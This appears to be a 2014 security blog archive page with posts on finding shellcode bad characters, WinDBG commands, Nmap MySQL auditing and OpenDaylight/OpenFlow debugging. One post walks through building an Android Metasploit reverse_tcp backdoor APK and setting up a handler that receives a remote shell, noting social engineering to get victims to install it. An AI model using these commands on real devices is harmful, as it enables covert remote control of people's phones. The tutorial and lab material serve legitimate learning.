Friday, April 18, 2014

Exploitation: Identifying Bad Characters in a Shellcode

Characters which break the execution of a shellcode are considered bad characters.

Before delving deeper, we should understand what shellcode is:
http://en.wikipedia.org/wiki/Shellcode

To find out which bytes are bad characters for the specific application we are trying to exploit, generate a byte array covering 0x00 to 0xff. In Immunity Debugger with the mona plugin this is done with:
!mona bytearray

Copy the generated byte array into the shellcode, i.e. after the NOP (\x90) sled. Exploit the vulnerable application and, at the time of the crash, inspect the alignment of the byte array in memory. Wherever the alignment breaks, or a byte between 0x00 and 0xff is missing, that byte is a bad character. Once a bad character is found, remove it from the byte array and exploit the application again with the new shellcode. Repeat until 0xff is reached.

Common Bad Characters
0x00    NULL (\0)
0x09    Tab (\t)
0x0a    Line Feed (\n)
0x0d    Carriage Return (\r)
0xff    Form Feed (\f)
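Added example, not code from the original post: the generate/compare loop described above, written in Python. byte_array() builds the 0x00-0xff array minus the bytes already known to be bad, first_bad_char() does the job that comparing the array in the debugger does, and simulated_target() is a constructed stand-in for the vulnerable input path (it drops line feeds and truncates at a carriage return), not a real application.

```python
def byte_array(exclude=b"\x00"):
    """All 256 byte values in order, minus the ones already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)

def first_bad_char(sent, observed):
    """Compare the bytes we sent with the bytes read back from memory at the crash.
    Returns (offset, expected_byte) of the first divergence, or None if intact.
    A stripped, translated or truncating byte shows up here; everything after it
    is shifted, so only the first divergence per round is trustworthy."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return i, b
    return None

def find_bad_chars(transfer, start_exclude=b"\x00", max_rounds=256):
    """Repeat the send/compare loop until the array survives unchanged.
    `transfer` stands in for the application: it takes the bytes we send and
    returns what ends up in memory."""
    bad = bytearray(start_exclude)          # NULL is assumed bad from the start
    for _ in range(max_rounds):
        arr = byte_array(bytes(bad))
        hit = first_bad_char(arr, transfer(arr))
        if hit is None:
            return bytes(bad)               # array arrived intact: done
        bad.append(hit[1])                  # drop the offender and go again
    raise RuntimeError("did not converge")

def simulated_target(data):
    """Constructed stand-in for the vulnerable input path: a text-style parser
    that removes \\n and stops reading at the first \\r."""
    data = data.replace(b"\x0a", b"")
    return data.split(b"\x0d", 1)[0]

if __name__ == "__main__":
    found = find_bad_chars(simulated_target)
    print("bad chars:", " ".join("\\x%02x" % b for b in found))
```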

Wrote a small program to generate the hex numbers
******************************************
 root@kali-arpman:~# cat hex_numbers.c
#include <stdio.h>   /* the angle-bracket headers were eaten by the blog's HTML embedding */
#include <stdlib.h>

int main(void)
{
    int i;

    printf("disects: Generate 0x00 to 0xff Hex Numbers\n");
    for (i = 0; i <= 255; i++)
    {
        /* start a new row every 8 values */
        if (i % 8 == 0 && i >= 8)
            printf("\n");

        /* %#.2x prints at least two hex digits with a 0x prefix, except for
           zero, where the # flag adds no prefix: the first entry shows as "00" */
        printf("%#.2x  ", i);
    }

    printf("\n");
    return 0;
}
root@kali-arpman:~# gcc hex_numbers.c -o hex_numbers
root@kali-arpman:~#
root@kali-arpman:~#
root@kali-arpman:~# ./hex_numbers
disects: Generate 0x00 to 0xff Hex Numbers
00  0x01  0x02  0x03  0x04  0x05  0x06  0x07
0x08  0x09  0x0a  0x0b  0x0c  0x0d  0x0e  0x0f
0x10  0x11  0x12  0x13  0x14  0x15  0x16  0x17
0x18  0x19  0x1a  0x1b  0x1c  0x1d  0x1e  0x1f
0x20  0x21  0x22  0x23  0x24  0x25  0x26  0x27
0x28  0x29  0x2a  0x2b  0x2c  0x2d  0x2e  0x2f
0x30  0x31  0x32  0x33  0x34  0x35  0x36  0x37
0x38  0x39  0x3a  0x3b  0x3c  0x3d  0x3e  0x3f
0x40  0x41  0x42  0x43  0x44  0x45  0x46  0x47
0x48  0x49  0x4a  0x4b  0x4c  0x4d  0x4e  0x4f
0x50  0x51  0x52  0x53  0x54  0x55  0x56  0x57
0x58  0x59  0x5a  0x5b  0x5c  0x5d  0x5e  0x5f
0x60  0x61  0x62  0x63  0x64  0x65  0x66  0x67
0x68  0x69  0x6a  0x6b  0x6c  0x6d  0x6e  0x6f
0x70  0x71  0x72  0x73  0x74  0x75  0x76  0x77
0x78  0x79  0x7a  0x7b  0x7c  0x7d  0x7e  0x7f
0x80  0x81  0x82  0x83  0x84  0x85  0x86  0x87
0x88  0x89  0x8a  0x8b  0x8c  0x8d  0x8e  0x8f
0x90  0x91  0x92  0x93  0x94  0x95  0x96  0x97
0x98  0x99  0x9a  0x9b  0x9c  0x9d  0x9e  0x9f
0xa0  0xa1  0xa2  0xa3  0xa4  0xa5  0xa6  0xa7
0xa8  0xa9  0xaa  0xab  0xac  0xad  0xae  0xaf
0xb0  0xb1  0xb2  0xb3  0xb4  0xb5  0xb6  0xb7
0xb8  0xb9  0xba  0xbb  0xbc  0xbd  0xbe  0xbf
0xc0  0xc1  0xc2  0xc3  0xc4  0xc5  0xc6  0xc7
0xc8  0xc9  0xca  0xcb  0xcc  0xcd  0xce  0xcf
0xd0  0xd1  0xd2  0xd3  0xd4  0xd5  0xd6  0xd7
0xd8  0xd9  0xda  0xdb  0xdc  0xdd  0xde  0xdf
0xe0  0xe1  0xe2  0xe3  0xe4  0xe5  0xe6  0xe7
0xe8  0xe9  0xea  0xeb  0xec  0xed  0xee  0xef
0xf0  0xf1  0xf2  0xf3  0xf4  0xf5  0xf6  0xf7
0xf8  0xf9  0xfa  0xfb  0xfc  0xfd  0xfe  0xff
root@kali-arpman:~#

******************************************

http://seclists.org/basics/2011/Mar/77
http://www.offensive-security.com/metasploit-unleashed/Generating_Payloads

Other interesting posts on the blog
http://blog.disects.com/2014/04/hacking-android-devices-using.html
http://blog.disects.com/2014/04/nmap-scripting-engine-auditing-mysql.html

Saturday, April 12, 2014

Hacking Android devices using Metasploit Backdoor

In this post we will see how to use backdoors generated by Metasploit to gain access to Android devices. I am using a Nexus 7 tablet as the victim.

SETUP DESCRIPTION
192.168.1.102    Victim's IP address (Android Nexus 7 tablet)
192.168.1.140    Attacker's IP address (Metasploit)

I am using the AirDroid app on the Nexus 7 to download the Metasploit backdoor (the malicious app). In real scenarios an attacker would host a web server with the malicious app and entice users to install it using various social engineering techniques.

BACKDOOR CREATION
I am using Kali Linux with the Metasploit Framework installed to generate the payload.
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.140 LPORT=4488 R > andr_bd.apk
msfpayload    Metasploit command to create payloads (exe, java, apk etc.)
LHOST         (local host) attacker's IP address for the victim to connect back to
LPORT         (local port) port for the victim to connect back to
R             msfpayload parameter indicating generation of a raw payload
APK           Application Package file

Successful execution of msfpayload creates andr_bd.apk, which is a Metasploit reverse TCP backdoor. When the app is installed on any Android device, it connects back to the attacker's IP address (192.168.1.140 here). Copy the app to the Nexus 7 tablet using AirDroid and install it; a successful installation shows the screenshot given below.

Before installing the app on the Nexus 7, the attacker needs to run the following Metasploit commands so that the victim's machine can connect back to the attacker's machine (LHOST and LPORT must match the values used when generating the payload).
$ msfconsole
msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.140
msf exploit(handler) > set LPORT 4488
msf exploit(handler) > exploit

We successfully got Metasploit’s meterpreter shell.

Post exploitation commands

Full paper can be accessed from
http://disects.com/whitepapers/Hacking_Android_devices_using_Metasploit_backdoors.pdf

Following articles might be of interest
http://blog.disects.com/2012/05/cain-and-abel-password-cracking.html
http://blog.disects.com/2013/12/manual-unpacking-of-upx-packed-binary.html

Saturday, April 5, 2014

WinDBG: Useful Debugging Commands

Open "Debugging Tools for Windows" help file
0:017> .hh

Display registers
0:017> r

Display Current Process
0:017> |.
0:017> |
Unassemble Function or address
0:017> uf mshtml!CElement::Doc
0:017> u address

Assemble at Address
0:017> a address

Stack Trace
0:017> knL

Display Stack Backtrace
0:017> k
Trace (t) command executes a single instruction or source line and optionally displays the resulting values of all registers and flags.
0:017> t

Set break point
0:017> bp address

List break points
0:017> bl

Search for a String
0:017> s -a 0x00000000 L?7fffffff "disects"

The DLL is loaded between 03b10000 and 03fd000; search this area for the byte sequence 5d c3 (pop ebp; ret)
0:014> s 03b10000 l 03fdd000 5d c3

On Intel machines, looking at the disassembled SEH code, you will see an instruction that moves a DWORD ptr from FS:[0]. This ensures that the exception handler is set up for the thread and will be able to catch errors when they occur. The opcode for this instruction is 64A100000000. If you cannot find this opcode, the application/thread may not have exception handling at all.

Dump the TEB
0:017> d fs:[0]

Displays the current exception handler chain
0:017> !exchain

Display information about a local variable, global variable or data type (structures and unions).
0:017> dt var1

Display the array arr1 under var1
0:017> dt var1 -a arr1

Display all types and globals under nt
0:017> dt nt!*

Look at the default process heap; shows the percentage of busy blocks
0:017> !heap -stat -h 00150000

List allocations of a specific size
0:017> !heap -flt s fffe0

Display data at an address or a register
0:017> d 03694024-10
0:017> d esp
To find which heap entry a particular address (here, 0c0c0c0c) belongs to
0:017> !heap -p -a 0c0c0c0c

Refer to the link below for further reference
http://windbg.info/doc/1-common-cmds.html

Thursday, April 3, 2014

Nmap Scripting Engine: Auditing MySQL Server

Nmap is an Open Source tool for Network Mapping, Network Inventory and Security Auditing. Nmap uses raw IP packets to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
 
MySQL is an Open Source Relational Database Management System (RDBMS).
 
I am using an Nmap TCP SYN scan to find all open ports.
 
Nmap Scripts are located at
/usr/share/nmap/scripts
on Kali Linux.
 
The snapshot below shows the scripts we used to audit the MySQL server. Nmap scripts disclose critical information like usernames, usernames without passwords, version, dump of hashes etc.

 
To run all the scripts related to MySQL execute below command.
# nmap --script "mysql-*" target_ip
 
In the above snapshots, replace 127.0.0.1 with the IP you want to scan/audit.
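Added example, not part of the original post: the audit above also produces machine-readable output with nmap --script "mysql-*" -p 3306 -oX scan.xml target_ip; this Python script triages that XML, rating each mysql-* script result so the DBA can fix the worst findings (empty passwords, leaked hashes) first. The XML below is constructed for the example, not a real scan, and the severity table is this example's own judgement.

```python
import xml.etree.ElementTree as ET

# Constructed stand-in for `nmap --script "mysql-*" -oX` output (not a real scan).
SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap --script mysql-* -oX - 127.0.0.1">
<host><address addr="127.0.0.1" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="3306"><state state="open"/><service name="mysql"/>
<script id="mysql-info" output="Protocol: 10&#xa;Version: 5.5.34-0ubuntu0.12.04.1">
  <elem key="Protocol">10</elem><elem key="Version">5.5.34-0ubuntu0.12.04.1</elem>
</script>
<script id="mysql-empty-password" output="root account has empty password">
  <table><elem key="root">&lt;empty&gt;</elem></table>
</script>
<script id="mysql-users" output="root, backup, debian-sys-maint"/>
</port>
</ports></host></nmaprun>
"""

# How serious each mysql-* script result is for the server owner (example's own rating).
SEVERITY = {
    "mysql-empty-password": "HIGH",    # login without a password
    "mysql-dump-hashes": "HIGH",       # password hashes exposed
    "mysql-users": "MEDIUM",           # account enumeration
    "mysql-databases": "MEDIUM",       # schema enumeration
    "mysql-info": "LOW",               # version disclosure
}
ORDER = ["HIGH", "MEDIUM", "LOW", "INFO"]

def triage(xml_text):
    """Return (host, port, script_id, severity, output) for every mysql-* result,
    worst first. Only open ports are considered; unknown scripts rate INFO."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue
            for script in port.findall("script"):
                sid = script.get("id", "")
                if not sid.startswith("mysql-"):
                    continue
                sev = SEVERITY.get(sid, "INFO")
                findings.append((addr, int(port.get("portid")), sid, sev,
                                 script.get("output", "").strip()))
    findings.sort(key=lambda f: ORDER.index(f[3]))
    return findings

if __name__ == "__main__":
    for addr, port, sid, sev, out in triage(SAMPLE_XML):
        print(f"[{sev}] {addr}:{port} {sid}: {out.splitlines()[0]}")
```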
 

Wednesday, March 26, 2014

Opendaylight (ODL) Controller Debugging using OSGI Commands


Most of the commands work with the CPqD switch; there are some limitations/bugs with OVSK.
Some commands apply to openflowplugin and some to the controller.

removeMeter
removeMeters
addMeter
addMeters
modifyMeter
modifyMeters
removeGroup
addGroup
modifyGroup
portDescStats
flowStats

tableStats
groupStats
meterStats
meterConfigStats
aggregateStats
descStats
addMDFlow

modifyMDFlow
removeMDFlow

startSync
addFlows
modifyFlows
removeFlows
modifyTable
addGroups
modifyGroups
removeGroups
tbegin

tcommit
trollback
cacheinfo
setLogLevel
getLogLevel
create
destroy
listen
unlisten
myController
getClusterNodes
listcaches
put
remove
dumper
get
listenActive
unlistenActive
putComplex
updateComplex
printUserLink
addUserLink
deleteUserLink
printNodeEdges
readflows
readflow
readports
readport
readtable
readdescr
modifyflow
removeflow
addflowv6
removeflowv6
umAddUser
umRemUser
umGetUsers
addAAAServer
removeAAAServer
printAAAServers
ofdumpstatsmgr
resetSwitchCapability
ofbw
txratewindow
ofstatsmgrintervals
prlh
prll
psl
pht
pet
ptick
pcc
ptm
psize
page
sage
eage
dage
scc
ecc
dcc
psnp
esnp
dsnp
spause
sdi
sports
addsw
remsw
pthrot
ethrot
dthrot
pem
bwfactor
px2r
px2rc
controllerShowQueueSize
controllerShowSwitches
controllerReset
controllerShowConnConfig
dumpPendingARPReqList
dumpFailedARPReqList
pencs
pdm
psc
pfc
psd
psp
psm
addContainer
createContainer
removeContainer
addContainerEntry
removeContainerEntry
addContainerFlow
removeContainerFlow
containermgrGetRoles
containermgrGetAuthorizedGroups
containermgrGetAuthorizedResources
containermgrGetResourcesForGroup
containermgrGetUserLevel
containermgrGetUserResources
saveConfig
api3ut
scheme
printNodes

Tuesday, March 25, 2014

OpenFlow 1.3 Protocol Packet Structure: OFPT_HELLO

The OpenFlow protocol is used for communication between the ODL controller and switches supporting OpenFlow (OVSK, CPqD, Cisco switches (N3K, Cat3K etc.), Brocade, HP, Juniper etc.). Each OpenFlow message begins with an OpenFlow header which has Version (0x04 for OF1.3, 1 byte), Type (1 byte), Length (2 bytes) and Transaction ID (4 bytes). In OF1.3 we have 30 different message types, whose names start with OFPT_.

192.168.56.103    Controller
192.168.56.104    Mininet (OVSK)
192.168.56.102    Mininet (CPqD)



If Protocol field is seen as TCP instead of OpenFlow, right click on the packet of interest -> Decode As -> Transport tab -> select Openflow -> OK
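Added example, not from the original post: a Python parser for the 8-byte OpenFlow header described above, extended to walk the OFPT_HELLO version-bitmap elements of OF1.3 so you can see which wire versions a peer advertises, with length checks so a truncated or malformed message is rejected rather than misread. The hello bytes are constructed for the example, not a capture from the lab.

```python
import struct

OFP_HEADER = struct.Struct("!BBHI")   # version(1) type(1) length(2) xid(4), network order
OFPT_HELLO = 0                        # message type of OFPT_HELLO
OFPHET_VERSIONBITMAP = 1              # hello element carrying supported versions

# Constructed sample: OF1.3 OFPT_HELLO with one version-bitmap element advertising
# OF1.0 (bit 1) and OF1.3 (bit 4), i.e. bitmap 0x00000012. Not a real capture.
SAMPLE_HELLO = bytes.fromhex(
    "04 00 00 10 00 00 00 01"   # version=4 type=0 length=16 xid=1
    "00 01 00 08 00 00 00 12"   # elem type=1 length=8 bitmap=0x00000012
)

def parse_header(data):
    """Decode the common OpenFlow header and sanity-check its length field."""
    if len(data) < OFP_HEADER.size:
        raise ValueError("short OpenFlow header")
    version, msg_type, length, xid = OFP_HEADER.unpack_from(data)
    if length < OFP_HEADER.size or length > len(data):
        raise ValueError(f"bad length field {length}")
    return {"version": version, "type": msg_type, "length": length, "xid": xid}

def parse_hello_versions(data):
    """Return (header, sorted list of wire versions) advertised in an OFPT_HELLO.
    Elements are TLVs (type 2, length 2) padded to 8 bytes; length excludes padding."""
    hdr = parse_header(data)
    if hdr["type"] != OFPT_HELLO:
        raise ValueError("not an OFPT_HELLO")
    body = data[:hdr["length"]]
    versions = set()
    off = OFP_HEADER.size
    while off + 4 <= len(body):
        etype, elen = struct.unpack_from("!HH", body, off)
        if elen < 4 or off + elen > len(body):
            raise ValueError("bad hello element length")
        if etype == OFPHET_VERSIONBITMAP:
            nbitmaps = (elen - 4) // 4
            for i, bm in enumerate(struct.unpack_from("!%dI" % nbitmaps, body, off + 4)):
                for bit in range(32):
                    if bm >> bit & 1:
                        versions.add(32 * i + bit)   # bit n set => version n supported
        off += (elen + 7) // 8 * 8
    if not versions:
        versions.add(hdr["version"])   # no bitmap element: header version only
    return hdr, sorted(versions)

if __name__ == "__main__":
    print(parse_hello_versions(SAMPLE_HELLO))
```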

Monday, March 24, 2014

SDN Opendaylight Controller: Add/Remove Flow Entries using REST


Start Controller
$ ./run.sh

Start Open vSwitches using Mininet
$ sudo mn --topo single,2 --controller remote,ip=192.168.56.101 --switch ovsk,protocols=OpenFlow13


192.168.56.101    Virtual Machine (VM) where the Opendaylight (ODL) Controller is running
192.168.56.102    VM where Mininet is running

We will be using f206.xml for our testing.

Before sending the REST request, click on the Basic Auth tab and configure username/password as admin/admin, which are the default credentials for accessing the controller GUI, then click Refresh Headers. Also configure Content-Type and Accept as shown below.

To add a flow entry to Open vSwitch, use the PUT request method.

The table_id and id tags of the XML become part of the REST request URL:

http://192.168.56.101:8080/restconf/config/opendaylight-inventory:nodes/node/openflow:1/table/2/flow/133

Select raw -> XML as the data format, copy f206.xml into the text body and click Send. It should return a "200 OK" status code, which indicates the flow was successfully sent to the controller without any issues; the information is saved in the controller's cache (Configuration Data Store).



Whether the flow was successfully sent to the switch can be verified with the ovs-ofctl command.

To remove a flow from the switch using a REST request, use DELETE instead of PUT.
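Added example, not the post's own code: a Python script that derives the restconf URL from the table_id and id tags of the flow XML and sends the PUT or DELETE with the Basic Auth and XML headers described above. FLOW_XML is a constructed stand-in for f206.xml (only the tags the URL needs, under the urn:opendaylight:flow:inventory namespace, which is assumed here), and the controller address is the one from the post.

```python
import base64
import urllib.request
import xml.etree.ElementTree as ET

CONTROLLER = "http://192.168.56.101:8080"   # ODL VM from the post

# Constructed stand-in for f206.xml: the real file also carries match/instructions.
FLOW_XML = """<flow xmlns="urn:opendaylight:flow:inventory">
  <id>133</id>
  <table_id>2</table_id>
  <priority>2</priority>
</flow>
"""

def _local(tag):
    """Strip the XML namespace so tags can be matched by local name."""
    return tag.rsplit("}", 1)[-1]

def flow_url(flow_xml, node="openflow:1", base=CONTROLLER):
    """Build the restconf config URL from the <table_id> and <id> tags of the flow."""
    root = ET.fromstring(flow_xml)
    fields = {_local(child.tag): (child.text or "").strip() for child in root}
    for key in ("table_id", "id"):
        if not fields.get(key, "").isdigit():
            raise ValueError(f"flow XML needs a numeric <{key}>")
    return (f"{base}/restconf/config/opendaylight-inventory:nodes/node/{node}"
            f"/table/{fields['table_id']}/flow/{fields['id']}")

def send_flow(flow_xml, method, user="admin", password="admin"):
    """PUT installs the flow in the configuration data store; DELETE removes it.
    Returns the HTTP status code (200 means the controller accepted the request)."""
    if method not in ("PUT", "DELETE"):
        raise ValueError("method must be PUT or DELETE")
    body = flow_xml.encode() if method == "PUT" else None
    req = urllib.request.Request(flow_url(flow_xml), data=body, method=method)
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req.add_header("Authorization", "Basic " + token)   # same as the Basic Auth tab
    req.add_header("Accept", "application/xml")
    if body is not None:
        req.add_header("Content-Type", "application/xml")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status

if __name__ == "__main__":
    print(flow_url(FLOW_XML))
    # print(send_flow(FLOW_XML, "PUT"))      # add the flow
    # print(send_flow(FLOW_XML, "DELETE"))   # remove it again
```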

Following articles might be of interest
SDN Opendaylight Controller: Add/Remove Flow Entries using OSGI CLI
http://blog.disects.com/2014/03/sdn-opendaylight-controller-addremove_24.html

ovs-ofctl OVS action commands for OpenFlow 1.3
http://blog.disects.com/2014/01/ovs-ofctl-ovs-action-commands-for.html

ovs-ofctl commands on OpenFlow 1.3 Mininet Open vSwitch (OVSK)
http://blog.disects.com/2014/01/ovs-ofctl-commands-on-openflow-13.html

Interested in Ethical Hacking!
http://blog.disects.com/2012/05/cain-and-abel-password-cracking.html